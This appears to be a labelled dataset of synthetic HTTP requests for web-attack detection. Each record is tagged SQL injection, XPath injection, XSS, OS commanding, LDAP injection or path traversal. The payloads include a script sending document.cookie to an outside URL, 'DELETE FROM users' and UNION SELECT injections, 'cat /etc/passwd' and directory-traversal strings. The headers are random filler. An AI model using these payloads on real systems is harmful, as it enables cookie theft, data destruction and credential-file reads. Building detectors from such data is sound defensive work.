~~~~~: ~~~~~~~~~~~~~~~~~~~~~

Rre1txynUrh1tu=60954820&7lh82l3eetma=<a  href   = "about:<s&#99;ript   >[document.location.replace  ('http://www.st.com/cgi-bin/isnero.cgi'+document.cookie);]</script   > " >

End - Id: 46927
Start - Id: 41898
class: SqlInjection
GET /mskQc1ZhjDXAEQs/sTe6/eaxEvYrE/uk.bFlsHeUrmF/yFqi7ceaiallmdlootav/damsg/une/eLqXEhbSOBGs79lZ-1U/tXchquIaP8.shtml?ltmy=9&gliybd1n5hdNkos=sN13Gv&82ipiie=363683999&xtbetweenEDb=ar&hpNer3fso9k=12740946&bwghehtl5=eemW&drsndliDedcdnaN=s0ixfrn2%27%29%3B+++DELETE+++++FROM+users+WHERE+++++upper%28username%29++++%3D+++++upper%28+%27admin&mrqscr9id4gatv=7637&SkrS=e1ImhHUN91q8&fnmfhjti=3ta%3E%3B&rs0bNneet8=vamahcialonLfeotn HTTP/1.1
Host: 247.104.108.103:80
Connection: arbnira
Accept: application/zip;q=0.5, video/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: min-fresh=5
Client-ip: 199.227.44.84
Cookie: 0lpizparenst=PlW;seumdh7n6YETyxt=dsel;unlpuTddeyYp=592656429
Cookie2: $Version="074"
Date: Wed, 21 Apr 04 21:31:02 GMT
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: 7Adh@rholi48i.be
If-Modified-Since: Sun, 25 Sep 05 15:26:55 UTC
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: "ewigRc4DfZXDz1krSjNV"
If-Range: Fri, 03 Aug 07 05:27:36 GMT
Max-Forwards: 36
MIME-Version: 7.9
Pragma: adt='at'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest username="nruk"
Range: 814292-
Referer: http://isnoazen.com/tawmay/sSf6enA/gDt9co/tanskttt.gz
TE: gzip,deflate;q=0.9,chunked;q=0.8
Trailer: TE
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 0.4; t1-eo; rv:7.7.2) Gecko/83253803
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/4.6 172.53.55.129, Oft/8.5 www.ooghtst9.tiff, FTP/5.5 96.241.196.77
Transfer-Encoding: isise
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 643 206.216.27.149 "suiowsouaeabcnttoryg" "Thu, 27 Oct 05 01:48:14 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41898
Start - Id: 49003
class: XPathInjection
GET /n10m99@05YuWeURpw/auKfmUOFZBMq8@RN/ih5/1nt4oorlpecti/iuajh7UecAaoagx/mEXUTG9w8H41OKD/ua5ihsadnrtdn0os.nsf?iteki=7%3F%3Eh%3F%25u%253r&Gwts=swzcinexecinos%3EaN&4h8rio=fDjD0fE&erbtltieBxxex=6631&enaehtltggaotrs=hAhN3YzX&atenb=S&6BfsB3Vhavingr=jlr48iseb&LOexecBt=rost93njrit%7Cd&dwrulerEsu=p%3E&ecCoxBYV=Ier%27++++or++%28i+%3C+count%28utdn%2Fchild%3A%3Atext%28%29%29+++++and++j+++++%3C+++count%28Ttd%2Fchild%3A%3Acomment%28%29%29+++and++k+++++%3C+++count%28aoii8%2Fchild%3A%3A*%29+++++%29+++++or+++%27rtzh%27+++%3D+++%27++b1mw6i%27+or&u1oKroepa=207&nsa=h9a&7trophlnhesh0e=sroctnr HTTP/1.1
Host: www.tiso5oHo.st:80
Connection: close
Accept: audio/*, image/png;q=0.9, application/*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: ak2rqsho-iwmd, a-nIioE
Cache-Control: g7e7u1eo='ra9'
Client-ip: 65.168.75.165
Cookie: 6noamn=s
Cookie2: $Version="6"
Date: Sat, 10 Dec 05 24:55:49 GMT
ETag: W/"F3Wy2S.1Nr_Pm@MqEZXo"
Expect: 100-continue
From: w6wr@nytn.it
If-Modified-Since: Sat, 11 Aug 07 17:48:17 GMT
If-Unmodified-Since: Sun, 27 Mar 05 15:57:05 UTC
If-Match: *
If-None-Match: *
If-Range: "Nkl_1cQDSzNpyd8aNW"
Max-Forwards: 1
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: Basic aW5vZWk6aXR5ZWxpdA==
Range: -520,420265-,87-062067
Referer: http://www.wahshtn.de/tnwTo.fgf
TE: deflate,chunked
Trailer: Accept
User-Agent: ehRbe (i9i-VsbfGP)
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4233x4601
Via: 2.4 197.55.30.48
Transfer-Encoding: gzip
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49003
Start - Id: 50111
class: XPathInjection
PUT /6esaShti0egOn/-941@Ld1ggy6/sUfno57.KDk-/dXgBNrPsLS68O/nJasgorueufuoiequjH.html? HTTP/1.0
Content-Length: 88
Content-Language: ek
Content-Encoding: identity
Content-Location: http://e3tE.uk/DTbf9ig.gif
Content-MD5: M2ZoZXM0dXM3ODNyOEFheQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Mar 05 06:29:53 CET
Last-Modified: Fri, 08 Oct 04 22:34:18 UTC
Host: www.f4laqr.st:80
Connection: seftc
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.8
Cache-Control: min-fresh=941
Cookie: CewbMsioenxr=415;ttT=fgguaw0'   or     6 <  count(path/child::*)     or    'otelarsl'    =    ';tnn8sN=265138418
Date: Sun, 08 Feb 04 17:10:45 CET
Expect: zwax
If-Modified-Since: Fri, 29 Sep 06 22:04:34 UTC
If-Match: "3cMBFEWHgt41LnB"
Max-Forwards: 8959
MIME-Version: 0.6
Range: 03046-717,428-
Referer: /ecei3/in1etgcT/9iroe69.cfm
User-Agent: Mozilla/6.3 (Windows; U; WinNT 7.9; ba-en; rv:5.9.3) Gecko/16153219
UA-CPU: Sparc
Transfer-Encoding: deflate

etEa6guisseauAf=xih]HshcMeexecuxswwn&gclALZz_KEr=ls26&RmperltZ4=thn1&israj8MlslicnOe=1

End - Id: 50111
Start - Id: 46720
class: XSS
GET /F2/otf8ttseSComoraaii/bni6sum5dpiihohw/8SDjfIVN0Ax5uVL/g5eedMgbn/lAKQmHdIjlPlu1/X_S/xt0nCE2_xKIdRDZ3Ox59.html?FoeeHnje=38164589&aqd=759&d_1TopenD=i7PzuGqxLEW&d3emtltsof=neRirwAre4vuoue0l&5maepaf0hbeewy1=gv2yBZLd1.T&sfyzacLnah=Iwts7i&hExNetreau2x=ilink&q0duOeue=0629573&Ne7v=bas9nsipihe%2Bto&CBMCVNperl=9635860&jT4G7eallAR-h7=shtpasstex&xVHA=rup%40j%40b3_mTH&upxsteteeursnw=htl5b%2BawhereN98qR&uruCtwrOpst=%7Coe HTTP/1.1
Host: www.uhas9alBm.org:80
Connection: close
Accept: text/html, application/x-tar;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: m-MMhnEaaq, waebze-bh2r0, oo-rsk;q=0.7, n-l;q=0.5
Cache-Control: no-cache
Client-ip: 96.118.112.51
Cookie: vEtna=xlRo_qLLRQ;9lan8enp=:l  Ctmox ;<idse o=;0acrhjnwntuNs=eseys8"   ><body%20onload=alert    (document.cookie);  >;nllht=lma;maciNtiRmreyees=yzwoF;pem=e9no
Cookie2: $Version="55"
Date: Tue, 26 Jan 10 07:37:36 GMT
ETag: W/"0d8_3YwJZ6x_bpH"
Expect: 100-continue
From: ntaIttyn@vCxlso.org
If-Modified-Since: Mon, 07 Apr 08 17:57:41 CET
If-Unmodified-Since: Fri, 15 Aug 08 22:46:24 CET
If-Match: "Yb@qAy8XZmB9SmV"
If-None-Match: "6i0tQ.MMokClUqaTnz"
If-Range: "a1srNILzXsFQwu-1"
Max-Forwards: 73
MIME-Version: 5.4
Pragma: 3fectr='nr1oR'
Proxy-Authorization: Basic TmU4YTp2a0FvNm0=
Authorization: Basic aXRMZWRhOndwNW1lcmk=
Range: -4,-90,-87939
Referer: /qaSk/hVn0veS/vOesn4/weAeosdu/h71tsOt.php3
TE: deflate
Trailer: User-Agent
User-Agent: egnpignssdr
UA-Disp: 365,342,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3720x7004
Via: FTP/4.9 www.UenOcu.jpg, a5e5/8.2 www.igsu.htm:2
Transfer-Encoding: compress
Upgrade: cips/9.2, sovfy/0.4, Tuweh/3.9, dzd/8.5, do6/5.7
Warning: 173 143.169.118.167 "zsbnlyqean" "Tue, 04 Sep 07 08:19:57 UTC"
X-Forwarded-For: 166.176.57.0
X-Serial-Number: 15071765483594202
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46720
Start - Id: 44467
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.otclmar.de
Connection: y8p3
Accept: application/*, application/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate;q=0.3
Accept-Language: *
Cache-Control: min-fresh=6358
Client-ip: 1.111.16.222
Cookie: hgoutlReotet=1871869942;uTEyo=E2awindow.opena;aie7oe=4et8;5trwD=ebseo;crhIstee=yis2yi32nierhshaiS
Cookie2: $Version="9"
Date: Mon, 22 Dec 08 06:46:05 UTC
ETag: "9tG0dVXV9Y0RyLYk3AXZ"
Expect: jsde5on
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 01 Dec 04 09:54:12 UTC
If-Unmodified-Since: Thu, 28 Oct 04 01:11:51 CET
If-Match: *
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Mon, 09 Nov 09 19:43:14 CET
Max-Forwards: 2
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic cjNydDpzeHZlYXdzcQ==
Range: 6-02287,72753-
Referer: http://www.vUzsn.fr/r1rtykp/gm5edhn/rb16n/nLuja8pe/arfoahs.gz
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: hZ2X0qiCWn http://www.r4Te3.net
UA-CPU: Sparc
UA-Disp: 4598,6084,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: arpaj/4.2, l8tsI/0.9, 9dev/6.0, m7u/6.0, sin/4.9
Warning: 500 103.24.153.176 "urwer2tml4" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44467
Start - Id: 42079
class: SqlInjection
GET /thefiIs/sOTm3uGAwInOJgGmxE.nsf?5iRunrorthcIra=6012&nNcecN=insert%28heog&owhbTyttp=8880383350&sxGcyLe9Dbgsoundt=ngnf%5CesnLf9i%28n&taZ0htiie=hqydadtdSdsnbieote&0steu=%27++++%29+++UNION++ALL+++SELECT++++67%2C2489%2C0%2C8656%2C4++FROM++wn1pcmaer+++WHERE+%28++%27%27++%3D+%27&eounucdktNe=%3Fc3&IYchild8bATs3v00=179&r4lksho=apu&Sm7r8lmp1=ow.Tn&8otoopiEil=g HTTP/1.0
Host: 129.216.244.133
Connection: 6jrjn
Accept: text/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ert7b-afcxxetr, ewY1oV-t, v6-imaio;q=0.5
Cache-Control: wtbj1k1='u3'
Client-ip: 234.253.45.250
Cookie: zn=sK7;piHEh0=tahr;ihotalolr5w8mHl=rAwmepeao5lI;hLt=U);izeval7c <t<i
Cookie2: $Version="7"
Date: Wed, 26 Jan 05 07:06:03 CET
ETag: "SQ-tIM.HVaLNvisl3sL"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Sat, 31 Mar 07 20:51:50 GMT
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: *
If-None-Match: "09z3NyWNnJAYmcIw"
If-Range: Fri, 09 Sep 05 04:21:51 CET
Max-Forwards: 7199
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZXRhb2llOm9ZN2lJ
Authorization: NTLM bG9jb3NhcElwZWFzeGNvNXRpcmZuaWh0U2phYXJyNmE=
Range: 54-40255,-926,-098
Referer: http://www.h5Niaef.net/luilria.swf
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (compatible; MSIE 1.6; SunOS sun4u; toNbPtele)
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4241x2926
Via: HTTP/8.0 179.46.94.57
Transfer-Encoding: compress
Upgrade: uose/3.2, vzaeDe/0.5, 0rrE/2.7, gnnk/0.3, seow/3.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42079
Start - Id: 42710
class: SqlInjection
PUT /hGclddeleteqoUcRnIh4/iGp.UMQz0yv/ncrB/lJsDkHsQq_uVFpRqun/iar0glyEnhdig9EieE5/O-dLWLnomZSq/n9.PQEM/ezU4zZl@qk@hD-gK1/fq24vP3B/ahaS/@C0H5wgetd2V9JLy/jO3.msf? HTTP/1.0
Content-Length: 69
Content-Language: se
Content-Encoding: gzip
Content-Location: /p6hnyja/eGwarl/iIwtjce/iqnOso/9za6.jpeg
Content-MD5: aXRZYWl1b2VteEltb2Rxcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Tue, 20 Dec 05 06:04:32 UTC
Host: 195.9.14.192
Connection: Owneltt
Accept: application/rtf;q=0.8
Accept-Charset: x-mac-icelandic, x-mac-ce, x-mac-chinesesimp, windows-1257
Accept-Encoding: *;q=0.5
Accept-Language: '  )     UNION   ALL     SELECT  'na',826,9,'Nmweod',83    FROM     yoeniee   WHERE   (  ''=    '
Cache-Control: max-age=87
Client-ip: 34.238.18.93
Cookie: 1ues4fewodgpx=uHtlofoxsr;RLsdha=r0et;6pyuctoilay=d)so
Cookie2: $Version="69"
Date: Mon, 18 Dec 06 15:58:53 CET
ETag: W/"O9kcnRqr.hXbx6V_il8"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Mon, 21 May 07 18:31:47 CET
If-Unmodified-Since: Wed, 13 Jun 07 21:03:15 GMT
If-Match: *
If-None-Match: "Ucndbv_vfKhlIpNAphLM"
If-Range: Mon, 03 Dec 07 07:24:50 CET
Max-Forwards: 20
MIME-Version: 9.7
Pragma: areatpd=nrsaIta
Proxy-Authorization: Basic cjVuZDp4Z0ZlaHZoZg==
Authorization: NTLM YWFsbmtuNW5yeW50b3NIOG5hQTluWDlpaHVoTTFhdGNkb2lkZQ==
Range: 30889-130,957-,45-484050
Referer: /INrue.zip
TE: deflate,trailers,trailers
Trailer: TE
User-Agent: hmnoe1kduw (wh_32a9; fQkokXG@2u; emUW5j; sI9Hh52; lBezV2bIpv)
UA-Disp: 030,9561,32
UA-OS: Windows 98
UA-Color: color16
Via: 2.6 www.rDnBdoe.jpg, osHTyt/0.6 www.snjtOtQ.jpg
Transfer-Encoding: 5retfe; iyicdta=mahetiw
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 987 208.120.245.13 "dsnf" 
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

4hht4excuaqes1h=tokxoMn9tiamfsSfEm&rqMg2t=hnene5&smoherEoeds=ieE0-%

End - Id: 42710
Start - Id: 47737
class: XSS
GET /-I_gstylewr/a6.cfm?eetTeaet2alnur2=autoexecfb%3A&Pqabti3webRahoa=uJyVj_sKf&o09aa9rlgNheie=10528670&ti=67475&usteltalNru8t=r_zychDL&arearhxas1aqo=748223&ppqou=3350212&rtdi=%3Cstyle+++type++++%3D+%22+++text%2Fjavascript+%22+%3E%5Balert+%28%27dcdiiiahyu%27%29%3B%5D%3C%2Fstyle+++%3E HTTP/1.1
Host: www.rdteiuoD0.cz:9
Connection: udBlUr
Accept: audio/x-wav
Accept-Charset: hz-gb-2312;q=0.5
Accept-Encoding: identity, deflate;q=0.1, compress, compress, deflate;q=0.0
Accept-Language: *;q=0.0
Cache-Control: abac4enA=ns0
Client-ip: 190.127.106.120
Cookie: JeoiE=tXF;Cq1ZEuoO=ibatvbscriptsdrtvbscriptoreDoi;exec;kreetfeNIyeyrnn=se:toext 9nvefh;2RliiigtlIr=7685
Cookie2: $Version="054"
Date: Tue, 28 Dec 04 17:40:27 GMT
ETag: W/"t4qPdTf4owKXp5pB@_"
Expect: asn70
From: rlNe@ecetad6.fr
If-Modified-Since: Tue, 27 Apr 10 12:29:21 UTC
If-Unmodified-Since: Fri, 07 Dec 07 08:50:03 GMT
If-Match: *
If-None-Match: "DCo5jcZLU_NCld@QCLUR"
If-Range: "VA-2U3zaHesYoQssS69"
Max-Forwards: 523
MIME-Version: 7.7
Pragma: ehUEzeMe=od5rbea
Proxy-Authorization: Basic ZWVwaEk6ckljZEI=
Authorization: Digest response="F9baAe9ba8b2034BB34f77E04E268E69"
Range: 9-,057-2,501963-763
Referer: http://Moaa.cz/yk3e/1ingiuQ/greuueO9/heus81hm.asmx
TE: trailers,trailers
Trailer: Date
User-Agent: snEqui8/0.0.0
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 0.3 www.cnOsnEfk.jpeg, 8.6 www.nhgaJ.jpg
Transfer-Encoding: Ortu; dz2you=td8thhn
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 147.116.190.16
X-Serial-Number: 08031328367563648957
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47737
Start - Id: 37898
class: LdapInjection
GET /vvFfV1Q7Yly/rfsDF1sy.mspx?drr=eo2l%5C8yzfta&5nre=27&binspc-itmpbPLz=433388&td=s2iand&reUhlaatezledm0=493941&dEmvoe=tS6th++stdint%25ue&hsme5eMortdwnf=t%3Fin+ocs&errsh4y7n=slQE8KoP&hh=%29++++%28++++%7C++++%28displayName%3Dhad*%29+++%28name+%3Dhad*++++%29%28mail%3Dhad*+++%29&meLebsiotr=58958&rsiirs6zlG=912t+pbChPdupuf&mqatknesvcaohl=90&2pjhmailZ1BB1a8=sSa&btg=st+t&5tO5HAhor=eae HTTP/1.0
Host: 212.151.210.230:418
Connection: close
Accept: audio/x-wav, text/xml;q=0.7, text/html
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.2, gzip;q=0.1
Accept-Language: h-eeo;q=0.6, enwa-vnin;q=0.6, tetii-t
Cache-Control: min-fresh=9508
Client-ip: 176.10.100.235
Cookie: eeitcyn7=eXiH
Cookie2: $Version="1"
Date: Sat, 13 Nov 04 23:47:15 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 100-continue
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Sat, 28 Feb 04 01:30:30 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:15:02 UTC
If-Match: *
If-None-Match: *
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 95
MIME-Version: 1.5
Pragma: hthneo='r'
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -004662,03-,-2001
Referer: /e1pqn/hlsx5A9s/hwfIyhtp/pl9eslex.mpeg
TE: chunked;q=0.8,trailers
Trailer: User-Agent
User-Agent: lFadNtWddsisOkeTler
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.2 119.228.223.248, al0nfh/7.5 185.120.69.131
Transfer-Encoding: gzip
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37898
Start - Id: 46483
class: XSS
GET /<SCRIPT>/? HTTP/1.0
Host: 76.249.84.82
Connection: keep-alive
Accept: application/*, application/x-tar;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.1, identity, compress;q=0.1, deflate;q=0.3, compress;q=0.0
Accept-Language: tsw8ud-0aD1m;q=0.9, o9-qsA, gdt2e-l;q=0.5, h-avMl;q=0.7
Cache-Control: max-stale=30956
Client-ip: 137.78.176.107
Cookie: 68wgetK=Lmai8sarlM;x_LYOWS@c9=Rratahe;loteen79sHpeus=p0fylrBFaHA8;s7qtnuya=519;ebdr4eyO=eewindow.opendmopencopyr[m;dcerfsYiye=9eTr&w2
Cookie2: $Version="45"
Date: Fri, 27 Jun 08 21:21:06 CET
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: tphW
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Thu, 03 Jan 08 05:49:02 GMT
If-Match: *
If-None-Match: *
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 178
Pragma: iyb7u=etotEb
Proxy-Authorization: NTLM MHN0bm50bmJ5dGFuemVvdXI0SFN0TnVzMTdlbzBtNGl3ZWV2dGhjeWlUbndmYg==
Authorization: NTLM aUV3ZnNvaG9zN29laW9mZWh0YXdlTnQwZWl0aWFnMWU=
Range: -540
Referer: /kGru/lqmtgws/orhtyr/owvl.tar.gz
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.3 (X11; U; Open BSD i386 3.9; yu-iz; rv:3.1.4) Gecko/73807355
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: FTP/7.2 199.212.207.210
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 531 119.150.242.26 "jTg2xs5tderoaEpt" "Tue, 19 Feb 08 13:25:57 UTC"
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46483
Start - Id: 43437
class: OsCommanding
GET /yFroosht/Oliekfh/otx0wE_IwM3Z93w/hEwANEZ0vwirJsRxEyg/jstsma6h0tE/tOHj0KWPi7qb./otoswchdiaRed/oynzan9paR20/hV3ZzjHlTi7v8ZCmpHQ/5FEyW2IvnqjO/tda5DpedtsS5.htm?S3ndrren=lrlt8H&htacces5VxhttpjxpasswdxtT=p%29&ccwnda=98&ch5jsa=Tjt&P3adrop6zpwHEo=19468406&9s0ntcgeseks=uetcattu&AmvbscriptUG1w=EtEr%3Enph-2tozj%29dr&dnjanok90bi0ro5=cat+++++%2Fetc%2Fpasswd++++%7C&sui=77080&vToH2jdV6Kxf=rfC60f3z%40FB&kd3z9vwcaAAqxgt=322&R5ohukaessie=229859522&T5ps@gW74k63=etac9&uatnof=d8lypp%40sX9&e0stteAA=ga08ciiwgru2ysm HTTP/1.0
Host: 11.60.9.155
Connection: a9Iq
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: bi3-c;q=0.8, ene-8leriaw
Cache-Control: no-cache
Client-ip: 43.84.88.74
Cookie: 8rh4fuYs9a=Osjso3;nexgtocaeteIi=NN;eYpzKCIG-O3=4557033990;sodpTyUi=eovnioa4aeca
Cookie2: $Version="4"
Date: Mon, 11 Jul 05 01:27:20 UTC
ETag: W/"s9u-oZzMeEZFqxQxDc3j"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sun, 19 Feb 06 18:23:53 GMT
If-Unmodified-Since: Wed, 01 Mar 06 01:15:36 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Jan 10 21:20:43 CET
Max-Forwards: 2929
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b3pzbndsbzptaWg5cW9k
Authorization: Digest realm
Range: 89-,6-,2-
Referer: /tcteaE/CrrsTgN/ecsbmjye/ew2Mtst/Wcohdlny.png
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: iTaVMKZ http://www.2reei.cz
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: FTP/3.3 61.141.171.215
Transfer-Encoding: tsuC; 3rbx0n=pnccxaec
Upgrade: nb0Mi/9.5, daegas/8.7, tiso/6.9, rtN/5.7
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43437
Start - Id: 35958
class: PathTransversal
GET /elink3IRo3jj/s60er6sThraRewogMty/likevar5m.bin?4P3OGwEY=oLvkeQj2en&lshutdownmKXGPt=brdnrl0n&atdut=nh6-&rsfNbdgorm=tRko&L-QbrdWPHhmE=7BG5Y&63testi0N=zl&medr74ye1srddge=ge%7E%3C%29bn+ds%40e%7Enn%27includepnl&ahpw=xijohBsSx&ereoyen=pHr&xreebeed6=mSmmee+%7E+eNestyle&xNtoihsdxstte=icl&Faobtn5et4ia=88920796&p15iwShvO4s8=hoya3mtNteiccbtiO&cjs4se5ilwaoo=eud%3Fnart&jaaowwlgtee=euSfs%40l HTTP/1.1
Host: 123.53.238.244:2
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1251
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 45.228.255.238
Cookie: cwtci=248577;8oA2mtgrrsrlera=142699524;EirUiu=rfwhere
Cookie2: $Version="860"
Date: Mon, 23 May 05 17:59:57 GMT
ETag: "004MLFVpUtRTgtN5"
Expect: sonZogOs=ssleH
If-Modified-Since: Sun, 17 Apr 05 22:22:57 CET
If-Unmodified-Since: Fri, 25 Aug 06 08:36:49 CET
If-Match: "h-@rY-5ac96kTzn"
If-None-Match: "gdz52cR4yeh8XnVA7Ahf"
If-Range: Fri, 18 Feb 05 24:59:59 GMT
Max-Forwards: 54
Proxy-Authorization: Digest uri=http://uaGoo.it/rdpke/rpaxore.msf
Authorization: p8ttut oN20oals=eCro5ri
Referer: http://www.baoNvsc.be/lneuepg.mspx
TE: deflate,chunked;q=0.6
User-Agent: \WINNT\system.ini
Via: HTTP/2.9 www.ot3turu.tiff
Transfer-Encoding: gzip
Upgrade: XetBas/4.5, eiTt/2.0
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 35958
Start - Id: 49665
class: XPathInjection
GET /n5nnb/lRPzE_805Uq/nfnjssypfiuea/wn/1rZiRj@7arJK-j/uu.AL/ugW/3lsrnue/fxun3d7z0reHt/ud1derdno/eJ8Vb2HmJ3aZ6G/sbXtegordplr.html?srf=i+&tob=983884&ne6eTn=thxtJ&K-gSu1rRQaccept=ceEoe&0DRf=heti%3Adtai49ee&irk=d%7E&6nxrbteltih0se=http+eualt5x&r2=t5nLOa&qsmuRso=jXkN&dropr8ps=7456812698&qcelcMsoe=922148&Vr5pgJ@sbetweenQ=7007781&gre0erwhsa3yphh=aobhhcm%27%5D++%7C++P++++%7C+++%2F%2Fuser%5B+name%2Ftext%28+%29%3D%27i6tI&smtEo=Rh5 HTTP/1.0
Host: 28.11.74.201:80
Connection: ses3e
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: lt6ttahe-ewnqgtei;q=0.2, gaodie-runoOsg, rnrba-uaeHd;q=0.2
Cache-Control: only-if-cached
Client-ip: 35.126.171.6
Cookie: tywd=urbenmzpion;fh=e s3=bnn;l8ijpevdnteaeT=5781;zSpFihA=e ew0;aylTN=&oamailw6e> nodee
Cookie2: $Version="12"
Date: Fri, 06 May 05 23:16:07 CET
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Wed, 22 Sep 04 13:56:17 UTC
If-Unmodified-Since: Fri, 05 Nov 04 10:25:35 CET
If-Match: "ScmKt-P-qSEdVN@1hrlx"
If-None-Match: *
If-Range: Wed, 04 Mar 09 13:52:13 UTC
Max-Forwards: 24
MIME-Version: 8.7
Pragma: a5dme='ou'
Proxy-Authorization: Digest nonce
Authorization: Basic cW9pb3NzOmVvdW5t
Range: 7083-858216,-723,8872-
Referer: http://beeeeuc.fr/hCtnn/tkStsmy/o2eaw/cuteefo/lmt3dnt.nsf
TE: trailers,trailers
Trailer: Range
User-Agent: itoe4er4d/0.1.8.0.7
UA-CPU: x86
